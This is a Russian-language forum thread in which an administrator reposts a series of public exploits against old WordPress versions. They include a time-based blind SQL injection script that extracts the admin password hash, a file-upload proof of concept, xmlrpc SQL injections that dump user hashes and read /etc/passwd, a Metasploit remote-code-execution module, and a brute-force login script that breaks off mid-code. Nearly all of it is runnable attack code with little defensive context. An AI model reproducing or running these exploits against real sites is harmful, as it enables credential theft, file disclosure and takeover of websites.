19:03
Обновить
WordPress - Форум
| RSS



[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: LeadyTOR, aka_kludge 
Форум » ПрогрАммиРОванИе » Веб-прогрАмминг » WordPress
WordPress
aka_kludgeДата: Пятница, 05.06.2009, 12:04 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! smile \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';

echo "finding hash now ...\n";

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}

echo "\nFinal result: $field=$out\n\n";

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}

$curr = 0;

while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min\n";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

 
aka_kludgeДата: Пятница, 05.06.2009, 12:05 | Сообщение # 2
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

#! /usr/bin/env perl

# Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC
#
# Credits : Alexander Concha
# Website : http://www.buayacorp.com/
# Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html

use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;

my $ua = new LWP::UserAgent;
my $blog = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $remote_file = $ARGV[3];
my $local_file = $ARGV[4];
my $post_id = $ARGV[5];

if (@ARGV < 4) {
print "\nUsage:\n";
print " wp-file-upload.pl [local_file] [post_id]\n\n";
print " - full path to WordPress. http://victim.com/wordpress/ \n";
print " - valid username with any of these roles: author, editor, administrator\n";
print " - valid password for the user\n";
print " - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n";
print " [local_file] - file to upload\n";
print " [post_id] - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n";
exit();
}
$ua->requests_redirectable([]);
$blog =~ s/\/*$/\//;

$url = 'wp-app.php';
if ( 200 != $ua->head($url . '?action=/service')->code ) {
$url = 'app.php';
die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n"
unless 200 == $ua->head($url . '?action=/service')->code;
}

$auth_cookie = get_auth_cookie();

sub LWP::UserAgent::simple_request {
my($self, $request, $arg, $size) = @_;
$request->header('Cookie' => $auth_cookie);
$request->content_type('image/gif') if $request->method eq "PUT";
$request->uri($blog . $request->uri);

$self->_request_sanity_check($request);
my $new_request = $self->prepare_request($request);
$response = $self->send_request($new_request, $arg, $size);

print $request->method . " " . $request->uri . " " . $response->code . "\n";

return $response;
}

sub get_contents {
$file = shift;
if ( -e $file ) {
open FILE, $file or die("Invalid local file");
$file = join('', );
close FILE;
} else {
$file = <
PHP
}
return $file;
}
sub get_auth_cookie {
$response = $ua->head('wp-login.php?logout');
if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) {
return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass));
}
return '';
}
if (0 == $post_id) {
$response = $ua->get('wp-admin/post-new.php');
die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code;

if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) {
$response = $ua->post('wp-admin/post.php', [
'_wpnonce' => $1,
'action' => 'post',
'post_ID' => $post_id,
'post_type' => 'post',
'post_title' => 'foo',
'metakeyselect' => '#NONE#',
'metakeyinput' => '_wp_attached_file',
'metavalue' => $remote_file
], 'Cookie' => $auth_cookie);

# Checks for post-new.php?posted=post_ID
if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) {
$post_id = $1;
}
}
}
die "\nCould not get a valid post_id value.\n" unless 0 != $post_id;

$request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id);
$request->content(get_contents($local_file));
$response = $ua->request($request);

if ( 200 == $response->code ) {
print "\nIt seems that the file has been posted successfully... :P\n";
print "Use the following value to update the remote file: post_id '$post_id'\n";
} else {
print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n";
}

 
aka_kludgeДата: Пятница, 05.06.2009, 12:06 | Сообщение # 3
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

/*
El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php:

function wp_suggestCategories($args) {
global $wpdb;

$this->escape($args);

$blog_id = (int) $args[0];
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = $args[4];

if(!$this->login_pass_ok($username, $password)) {
return($this->error);
}

// Only set a limit if one was provided.
$limit = "";
if(!empty($max_results)) {
$limit = "LIMIT {$max_results}";
}

$category_suggestions = $wpdb->get_results("
SELECT cat_ID category_id,
cat_name category_name
FROM {$wpdb->categories}
WHERE cat_name LIKE '{$category}%'
{$limit}
");

return($category_suggestions);
}

Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima.

Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario.

Credits: Alex de la Concha

code c sharp:
*/

using System;
using System.Net;
using System.Text;
using System.Xml;
using System.Text.RegularExpressions;
using System.Security.Cryptography;

class Program
{
static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";

string data = @"
wp.suggestCategories

1
{0}
{1}
1
0 UNION ALL SELECT user_login, user_pass FROM {2}users

";

string cookieHash = GetCookieHash(targetUrl);

using (WebClient request = new WebClient())
{
/* Probar con el prefijo por omisión */
string response = request.UploadString(targetUrl + "xmlrpc.php",
string.Format(data, login, password, "wp_svn_"));

/* Se hace una nueva petición si la consulta anterior falla */
Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+");
if (match.Success)
{
response = request.UploadString(targetUrl + "xmlrpc.php ",
string.Format(data, login, password, match.Groups[1].Value));
}

try
{
XmlDocument doc = new XmlDocument();
doc.LoadXml(response);

XmlNodeList nodes = doc.SelectNodes("//struct/member/value");

if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null)
{
string user, pass;
/* Mostrar lista de:
* Usuario md5(contraseña)
* Cookie de Autenticación
*
*/
for (int i = 0; i < nodes.Count / 2 + 1; i += 2)
{
user = nodes.Item(i).InnerText;
pass = nodes.Item(i + 1).InnerText;
Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}",
user,
pass);
Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n",
cookieHash,
user,
MD5(pass));
}
}
else
{
Console.WriteLine("Error:\n{0}", response);
}
}
catch (Exception ex)
{
Console.WriteLine("Error:\n" + ex.ToString());
}
}
}

private static string GetCookieHash(string targetUrl)
{
WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout");
request.Method = "HEAD";
(request as HttpWebRequest).AllowAutoRedirect = false;

WebResponse response = request.GetResponse();
if (response != null)
{
Match match = Regex.Match(response.Headers["Set-Cookie"],
@"wordpress[a-z]+_([a-z\d]{32})",
RegexOptions.IgnoreCase);

if (match.Success)
return match.Groups[1].Value;
}
return string.Empty;
}
public static string MD5(string password)
{
MD5CryptoServiceProvider x = new MD5CryptoServiceProvider();
byte[] bs = Encoding.UTF8.GetBytes(password);
bs = x.ComputeHash(bs);
StringBuilder s = new StringBuilder();
foreach (byte b in bs)
{
s.Append(b.ToString("x2").ToLower());
}
return s.ToString();
}
}
/*
Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php.

o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5.

static void Main(string[] args)
{
string targetUrl = "http://localhost/wp/";
string login = "alex";
string password = "1234";

hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password.
Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ]

:: [Slappter] ::
*/

 
aka_kludgeДата: Пятница, 05.06.2009, 12:07 | Сообщение # 4
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

#!/usr/bin/perl -w

#Wordpress 2.1.2 SQL Injection POC
#Credits: sid@notsosecure.com
#Thanks to ferruh (ferruh@mavituna.com)for improving my exploitation skills
#website:www.notsosecure.com

#Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when exploting with the credentials of a valid user. The user can belong to 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely to be vulnerable as well.

#Example:---------------------------------------------------------------------------------------
#C:\wp-xmlrpc-2-2-sql.pl" http://192.168.2.4/apache2-default/wordpress/ author author 5
#
# The usage is correct
#

  • Trying Host http://192.168.2.4/apache2-default/wordpress/ ...
    #[+] The xmlrpc-2-2 server seems to be working
    #--------------------
    #Username for id = 1 is:--> admin
    #
    #Md5 hash for user: admin
    #
    #is: 21232f297a57a5a743894a0e4a801fc3
    #
    #--------------------
    #Username for id = 2 is:--> contri
    #
    #Md5 hash for user: contri
    #
    #is: 95a178dde9d3fa2bde4971f10d3acc3e
    #
    #--------------------
    #Username for id = 3 is:--> author
    #
    #Md5 hash for user: author
    #
    #is: 02bd92faa38aaa6cc0ea75e59937a1ef
    #
    #-----------------------
    #Total Number of Users found:-->3
    #-----------------------
    #Mysql is running as: root@localhost
    #
    #Encrypted password for: root@localhost
    # is: root@localhost67457e226a1a15bd
    #
    #This deserves no mercy.... Lets get the /etc/passwd
    #.......imho...Here is the /etc/passwd file:
    #root:x:0:0:root:/root:/bin/bash
    #daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    #bin:x:2:2:bin:/bin:/bin/sh
    #sys:x:3:3:sys:/dev:/bin/sh
    #sync:x:4:65534:sync:/bin:/bin/sync
    #games:x:5:60:games:/usr/games:/bin/sh
    #man:x:6:12:man:/var/cache/man:/bin/sh
    #lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    #mail:x:8:8:mail:/var/mail:/bin/sh
    #news:x:9:9:news:/var/spool/news:/bin/sh
    #uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    #proxy:x:13:13:proxy:/bin:/bin/sh
    #www-data:x:33:33:www-data:/var/www:/bin/sh
    #backup:x:34:34:backup:/var/backups:/bin/sh
    #list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    #gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    #messagebus:x:100:103::/var/run/dbus:/bin/false
    #postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    #haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
    #gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false
    #mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
    #sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
    #snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
    #postfix:x:108:116::/var/spool/postfix:/bin/false
    #stunnel4:x:109:118::/var/run/stunnel4:/bin/false
    #arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
    #statd:x:112:65534::/var/lib/nfs:/bin/false
    #sfs:x:113:121::/var/lib/sfs:/bin/false
    #ftp:x:114:65534::/home/ftp:/bin/false
    #Debian-exim:x:115:122::/var/spool/exim4:/bin/false
    #telnetd:x:116:123::/nonexistent:/bin/false
    #-------------------------------------------------------------------------------------------------------
    #use warnings;
    use LWP::UserAgent;
    my $ua = new LWP::UserAgent;
    $ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent);

    my $host = $ARGV[0]; # The path to xmlrpc.php
    my $username= $ARGV[1];#username
    my $password= $ARGV[2];#password
    my $postid= $ARGV[3];#post id which the user can edit
    my $pref = 'wp_'; # database prefix!
    my $hash_pass="";

    #$root='root@localhost.com';

    if (@ARGV < 4)
    {
    print " -----------------------------------------------------------------------\n";
    print " wp-xmlrpc-sql.pl - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2";
    print " by NotSoSecure // www.notsosecure.com \n";
    print " coded by sid //sid\@notsosecure.com // 31.03.2007\n";
    print " ------------------------------------------------------------------------\n";
    print " Usage:\n";
    print " wp-xmlrpc-sql.pl \n";
    print "\n";
    print " - host for attack\n full path eg. http://192.168.1.4/wordpress/ ";
    print " - valid username, can be in any of these role: contributor, author, editor \n";
    print " - valid password for the user\n";
    print " - valid post_id which the user can edit\n";
    print " ------------------------------------------------------------------------\n";
    exit();
    }

    print "\n The usage is correct\n

  • Trying Host $host ...\n";

    my $res = $ua->get($host.'/xmlrpc.php');

    if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
    {
    print "[+] The xmlrpc server seems to be working \n";
    }
    else
    {
    print "--------------------\n";
    print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n ";
    # Sloppy way of debugging, remove if you want
    open(LOG, ">wp_out.html"); print LOG $res->content;
    exit;
    }

    for ($i=1; $i<=100 ;$i++)
    {

    #bug: if a user has been deleted the corresponding id will be missing.
    #change this to point to the known ids or the usernames, or just make it go for top 100 ids

    #obtaining usernames and userid
    my $sql = "mt.setPostCategories ".$postid." union all select user_login from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req->content($sql);
    $res = $ua->request($req);
    $out = $res->content;


    if($out=~ /Bad login\/pass combination/)
    {
    print "--------------------\n";
    print "[error]-->Invalid username/password conbination\n";

    exit;
    }

    if($out=~ /Sorry, you can not edit this post/)
    {
    print "--------------------\n";
    print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n";

    exit;
    }

    if ($out =~ /DELETE FROM wp_post2cat/)
    {

    #print "found";
    print "--------------------\n";

    @result2=split(/category_id =/,$out);

    #to do: remove the assumption that username is less than 10 char
    $final=substr($result2[1],1,10);

    print "Username for id = ".$i." is:--> ".$final."\n";
    no warnings;
    #obtaining md5 hash for the username
    my $sql2 = "mt.setPostCategories ".$postid." union all select user_pass from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req2->content($sql2);
    $res2 = $ua->request($req2);
    $out2 = $res2->content;

    @result3=split(/category_id =/,$out2);

    $hash=substr($result3[1],1,33);
    print "Md5 hash for user: ".$final." \nis: ".$hash."\n";

    }
    else
    {
    print "-----------------------\n";
    print "Total Number of Users found:-->".($i-1)."\n";

    print "-----------------------\n";









    #lets find wat the db is running as:

    my $sql2 = "mt.setPostCategories ".$postid." union all select user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req2->content($sql2);
    $res2 = $ua->request($req2);
    $out2 = $res2->content;

    @result3=split(/category_id =/,$out2);

    $hash_user=substr($result3[1],1,20);
    print "Mysql is running as: ".$hash_user."\n";

    #lets get the password hash of the db_user for offline cracking
    #buggy code
    my $sql3 = "mt.setPostCategories ".$postid." union all select concat(user(),mysql.user.Password) from mysql.user where user=user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req3->content($sql3);
    $res3 = $ua->request($req3);
    $out3 = $res3->content;
    my $hash_pass="";
    #print $out3;
    if ($out3=~m/SELECT command denied to user/) {
    print "Cant get the password for this user, \nPermission Denied, Thats better security!!";
    exit;}
    else{
    @result3=split(/category_id =/,$out3);
    $hash_pass=substr($result3[1],1,30);
    print $hash_pass;
    if ($hash_pass eq "") {
    print "No Password set";
    }
    else{
    print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n";
    } #IF database is running as root, lets rip it apart

    if ($hash_user =~m/root/) {
    print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n";

    my $sql4 = "mt.setPostCategories ".$postid." union all select load_file(0x2f6574632f706173737764) ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 ";
    my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
    $req2->content($sql4);
    $res2 = $ua->request($req2);
    $out2 = $res2->content;


    @result3=split(/category_id =/,$out2);

    $hash=substr($result3[1],1,1600);

    print "Here is the /etc/passwd file:\n\n\n";
    print $hash;
    }

    exit;

    }

    }

    }

  •  
    aka_kludgeДата: Пятница, 05.06.2009, 12:07 | Сообщение # 5
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

    ##
    # Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
    # Name: php_wordpress.pm
    # License: Artistic/BSD/GPL
    # Info: I lub metasploit yummmm (str0ke ! milw0rm.com).
    #
    # Recoded Kartoffelguru's php code for metasploit. I love cookies. /str0ke
    #
    #
    #
    # - This is an exploit module for the Metasploit Framework, please see
    # http://metasploit.com/projects/Framework for more information.
    #
    ##

    package Msf::Exploit::php_wordpress;
    use base "Msf::Exploit";
    use strict;
    use Pex::Text;
    use bytes;

    my $advanced = { };

    my $info = {
    'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit',
    'Version' => '$Revision: 1.0 $',
    'Authors' => [ 'str0ke' ],
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' =>
    {
    'RHOST' => [1, 'ADDR', 'The target address'],
    'RPORT' => [1, 'PORT', 'The target port', 80],
    'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
    'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
    'SSL' => [0, 'BOOL', 'Use SSL'],
    },

    'Description' => Pex::Text::Freeform(qq{
    This module exploits a code execution exploit in wordpress blog <= 1.5.1.3.
    }),

    'Refs' =>
    [
    ['MIL', '1142'],
    ],

    'Payload' =>
    {
    'Space' => 512,
    'Keys' => ['cmd', 'cmd_bash'],
    },

    'Keys' => ['wordpress'],
    };

    sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
    }

    sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost = $self->GetVar('VHOST') || $target_host;
    my $path = $self->GetVar('RPATH');
    my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

    my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");");
    $encoded =~ s/\n//gm;

    my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));

    $byte.=".chr(32)";

    my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x');

    $str =~ s/\n//gm;

    my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
    "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
    "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
    ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
    "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
    "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;";

    my $req =
    "GET $path HTTP/1.0\r\n".
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
    "Host: $vhost:$target_port\r\n".
    "Pragma: no-cache\r\n".
    "Accept: */*\r\n".
    "Cookie: $data\r\n".
    "\r\n";

    my $s = Msf::Socket::Tcp->new(
    'PeerAddr' => $target_host,
    'PeerPort' => $target_port,
    'LocalPort' => $self->GetVar('CPORT'),
    'SSL' => $self->GetVar('SSL'),

    );

    if ($s->IsError){
    $self->PrintLine('

  • Error creating socket: ' . $s->GetError);
    return;
    }

    $self->PrintLine("

  • Sending the malicious WordPress Get request...");

    $s->Send($req);

    my $results = $s->Recv(-1, 20);
    $s->Close();
    $self->PrintLine($results);

    return;
    }

    1;

  •  
    aka_kludgeДата: Пятница, 05.06.2009, 12:09 | Сообщение # 6
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    WordPress <= 1.5.1.1 SQL Injection Exploit

    #!/usr/bin/perl -w
    #
    # SQL Injection Exploit for WordPress <= 1.5.1.1
    # This exploit shows the username of the administrator of the blog and his
    # password crypted in MD5, you must only choose the correct version of the target
    # Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml
    # Patch: download the last version at http://wordpress.org/download/
    # Coded by Alberto Trivero

    use LWP::Simple;

    print "\n\t====================================\n";
    print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
    print "\t= by Alberto Trivero =\n";
    print "\t====================================\n\n";

    if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) {
    print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n";
    print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n";
    exit(0);
    }

    $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1);
    $page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2);
    print "[+] Connected to: $ARGV[0]\n";
    $page=~m/:([a-f0-9]{32}):(.*?):/;
    print "[+] Username of administrator is: $2\n" if($2);
    print "[+] MD5 hash of password is: $1\n" if($1);
    print "[-] Unable to retrieve username\n" if(!$2);
    print "[-] Unable to retrieve hash of password\n" if(!$1);

     
    aka_kludgeДата: Пятница, 05.06.2009, 12:12 | Сообщение # 7
    Admin
    Группа: Администраторы
    Сообщений: 1058
    Награды: 2
    Репутация: 25
    Статус: Offline
    Wordpress <= 2.x dictionnary & Bruteforce attack

    ############## Source code #####################
    #!usr/bin/python
    # Flaw found on Wordpress
    # that allow Dictionnary & Bruteforce attack
    # Greetz goes to : NeoMorphS, Tiky
    # Vendor : http://wordpress.org/
    # Found by : Kad (kadfrox (at) gmail (dot) com [email concealed] / #kadaj-diabolik (at) hotmail (dot) fr [email concealed])
    import urllib , urllib2, sys, string
    tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
    tab = [ i for i in tab ]
    def node( table, parent, size ):
    if size == 0:
    pass
    else:
    for c in table:
    string = "%s%s"%( parent, c )
    data = {'log': sys.argv[2],
    'pwd': string}
    print "[+] Testing : "+string
    request = urllib2.Request(server, urllib.urlencode(data))
